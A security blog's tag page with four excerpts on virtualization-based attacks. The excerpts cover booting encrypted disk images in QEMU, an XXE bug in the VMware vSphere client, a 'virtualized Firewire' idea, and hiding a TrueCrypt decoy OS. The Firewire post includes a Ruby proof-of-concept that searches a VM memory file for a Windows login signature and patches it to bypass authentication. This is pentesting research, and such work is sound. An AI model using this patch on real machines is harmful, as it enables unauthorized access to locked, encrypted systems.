Tag: virtualization

attacking encrypted systems with qemu and volatility

Lately I’ve had to deal with setups which had transparent full disk encryption and were pretty hardened. If you are wondering what ‘transparent full disk encryption’  means, that’s how I call solutions that encrypt your hard disk, but don’t require any interaction from the user to boot into the operating system. They usually accomplish this because they:

  • use secure boot and a TPM with key sealing (good)
  • they use proprietary software-only obfuscation to hide the key (bad)
  • use an external hardware device to store the keys without secure boot or key sealing (bad)

Most of the time the goal is to break out of a preconfigured application and the usual tricks like these ones, don’t really work:

However getting access to safe mode / start up repair does partially work for some of these setups:

Partially, because most of the options were not present and those that were present only gave me a cmd.exe which was disabled with a local group policy. An interesting approach the defence side took was replacing explorer.exe with an executable which did nothing. Even if you managed to break out of their application you still had nothing, no desktop, no menu, no buttons etc. For a few setups where the ‘startup-repair’ options seemed to work the encryption drivers did not load, resulting in an environment with no access to the target disk. In case you were wondering about network attacks, those were a no go as well, since the firewalls were strictly configured for ingress and egress traffic, based on ip/port/application and yes the connection themselves used TLS with client certificates and not vulnerable to man in the middle attacks.

Usually when I encounter these environment it still is possible to perform a variety of Direct Memory Access (DMA) attacks using tools like inception or pcileech. In these cases however this was physically not possible, either because there were no DMA ports available or just because I didn’t have the correct hardware with me to perform the attacks.

A common issues with all those setups however was the fact that the disk encryption software did not seal the encryption keys to a hardware security device like a TPM. This enables an attacker to create an image from the hard disk and boot this image on another computer. If the attacker also got a hold of the enclosure (USB key, smart card, obfuscated algorithm, unencrypted partition) holding the encryption keys it becomes possible to boot the disk image and fully control the victim disk in an untrusted environment.

In this blog article we are going to have a look at some of the things that you can do when you can boot a disk image of an otherwise unpenetrable environment. Please keep in mind that in part we are reinventing the wheel for two reasons:

  • Learning the nitty gritty details
  • Having a portable and understandable solution

There are solutions available that probably would enable you to achieve the same result, but for my personal taste I prefer to have something much more lightweight that can be easily ported between QEMU versions. Additionally you could also achieve the same result with the quick & dirty approach of booting the image in VMWare, pausing the machine, editing the memory file, resuming the machine. However I prefer QEMU since it allows full control over the entire process, due to the build in GDB server as well as customising the inner workings by editing/adding code and recompiling it. The following existing projects already wrap QEMU with cool and handy features if you want to use these type of setups to analyse malware or other applications:

Enough introduction of what we are going to do, let’s dive in and start elevating our shells to SYSTEM ;)
Continue reading “attacking encrypted systems with qemu and volatility”

[old] VMware vSphere client XML External Entity attack

So this is a *really* old blog post that I wrote a while back when I discovered, or at least so I believed, an XXE bug in the VMware vSphere client. I reported this to the VMware security team but they were not able to reproduce the part where you would use a UNC path to try and steal the credentials of an user. I then got busy and never continued to investigate why they were not able to reproduce it. Since the vSphere client is being replaced by a web client I decided it couldn’t hurt to release this old post, also the likely hood of this being exploited is pretty low.

Curiosity (from Latincuriosus “careful, diligent, curious,” akin to cura “care”) is a quality related to inquisitive thinking such as exploration, investigation, and learning, evident by observation in human and many animal species.  (Wikipedia)

As always a driving force behind many discoveries, as well as the recent bug I found in the VMware vSphere client (vvc). Not a very interesting bug, yet a fun journey to approach things from a different perspective. After my last post about a portable virtual lab I wondered what the vvc used as a protocol to communicate with the esxi server and if it could contain any bugs. So this time instead of getting out ollydbg I decided to go for a more high-level approach. Let’s see how I poked around and found the XML External Entity (XXE) (pdf)  vulnerability in the vvc.

I first looked in the directory of vvc, just to know the type of files that resided there, here is a screenshot:

1

Logically the file that drew my attention was the config file of which the following settings also seemed like they would come in handy:

2

Seems like if we want to tinker with the connection a higher time-out would give us more time and a higher verbosity level of logging could help us during the poking around. Enough looking around at this point let’s get more active.

Continue reading “[old] VMware vSphere client XML External Entity attack”

Virtualized Firewire attack

This has been on my mind for a while but haven’t found the time to test it out yet, so here is the midnight idea if anyone wants to test it out.

Sometimes you need to become local administrator on a windows machine which has full disk encryption, is fully up to date and has very little software which could present you with a decent attack surface. Normally you would just whip out your readily available firewire attack tools, hook up your equipment and have a shell with elevated privileges in no-time. Let’s suppose the target machine doesn’t have a firewire port or it has the drivers disabled, how could we still pwn it?

This is when theory gets mixed with practical stuff (aka the part I haven’t practically tested yet). The essence of the firewire attack is to obtain direct memory access (DMA) with the goal to freely adjust memory. What if we could access the memory without the need for a firewire port, think virtualization. All (afaik) virtualization software uses a regular file on disk which represents the memory of the virtual machine. You prolly feel it coming by now, the attack boils down to:

 

Boot the target machine from a cd/dvd/usb virtualize the harddisk, pause the machine, patch the memory file, resume the machine, obtain elevated privileges.

Now that doesn’t sound to hard does it? Just one important obstacle: you do need the crypto credentials to be able to perform this attack. Think social engineering, hardware keylogger or just asking nicely.

I have performed a simulation of this attack to see if at least the part of pausing the virtual machine, patching the memory file and resuming it does work. The result is as expected it DOES work. Here is the ruby POC snippet that i wrote to test it out:

#used the offsets from winlockpwn
#POC virtualized firewire, https://diablohorn.wordpress.com
File.open("Windows XP Professional.vmem", "rb+") do |io|
 while(b = io.read(9)) #read the exact amount of bytes needed for the signature
 data = b.unpack("H18")
 if data.to_s == "8BFF558BEC83EC50A1".downcase #lol i like pretty uppercase hex in code
 spos = io.pos-9
 io.seek(io.pos+4) #skip the cookie bytes
 if io.read(3).unpack("H6").to_s == "8B4D20".downcase #this seems pretty constant check it to be sure
 puts "found: #{io.pos}"
 io.seek(spos+165) #advance to what we actually want to patch
 puts "Patching offset: " + io.pos.to_s
 puts "Original bytes: " + io.read(2).unpack("H4").to_s
 puts "Patching with B001"
 io.seek(io.pos-2)
 count = io.write("\xb0\x01") #patch it
 io.flush
 io.fsync #really, really make sure we write to disk
 puts "Written bytes #{count}"
 io.seek(io.pos-2)
 puts "Result: " + io.read(2).unpack("H4").to_s #verify it
 io.close
 exit #case closed
 end
 end
 #this kinda results in an endless loop
 fpos = io.pos-8
 io.seek(fpos)
 Signal.trap("USR1") do
 puts "position: #{fpos}b, #{fpos/1048576}mb"
 puts "data: %s" % data
 end
 end
end

The main obstacle at the moment is actually testing this out by virtualizing a real hard disk, since afaik it can result in a lot of problems which might prevent it from virtualizing correctly.

You might be wondering why we don’t just decrypt the harddisk, adjust some executable and encrypt the harddisk with the final result of elevated privileges. Well not all full disk encryption software allows you to decrypt the disk with the credentials you have. Some solution (specially if they are corporate) require additional keys and/or action to be taken before you are able to fully decrypt the harddisk. I assume that if you invest enough reversing time you might be able to still decrypt the harddisk with the credentials you have.

If anyone actually tests this out I would love to hear if it works, in case I get around to testing this myself I’ll let you guys know.

References

http://www.breaknenter.org/projects/ftwautopwn/
http://www.breaknenter.org/2011/05/winlockpwn-on-ubuntu/
http://www.moonloop.org/bin/view/Moonloop/Article:k9iBW83eo9cBsdUlg7Red6cUaILIXVGw
http://md.hudora.de/presentations/firewire/PacSec2004.pdf

Workable Deniability

So you have just finished installing the hidden operating system offered by TrueCrypt. You are however stuck with the following problem…you need frequent access to the hidden operating system…which means that you won’t be using the decoy system that much. According to the guidelines offered by TrueCrypt this means that your plausible deniability is a little bit less plausible. How about fixing this? What if you could “work” at the same time in both operating systems?

So there I was thinking I could write a blog posting with screenshots and a extended howto. Unfortunatly I am not able to perform the idea on my computer and I got no spare computer left. So I’m just going to put it out there and maybe someone feels like implementing it and letting me know how well it works.

The whole thing is rather simple, it actually fits in a sentence:

Run your decoy OS inside your hidden OS with the help of virtualization techniques.

Like stated before the claim is simple. It’s a shame I got no spare computer around atm to test it out. In theorie it should work fine. Only thing that worries me is the possible evidence that a virtualization application might leave on the booted decoy system, I’m thinking there is none…but I haven’t been able to test this.

So just to be clear this is NOT an idea to go against the TrueCrypt Security Precautions, it’s just another method to be able to spend more time in a hidden operating system without having to worry that it could be compromised because of forensics on your decoy os. This way all the timestamps and the temp files will be kept up to date in your decoy os while you are working in your hidden os.

To take it one step further…you could even write a few scripts to startup your email, mark them as read at varieng intervals and surf around on the web. If they ask you why you have script to automate things inside your decoy os, you can just answer with a simple answer: I’m lazy.

If I get a spare computer anytime soon I’ll be sure to let you know how this method works out.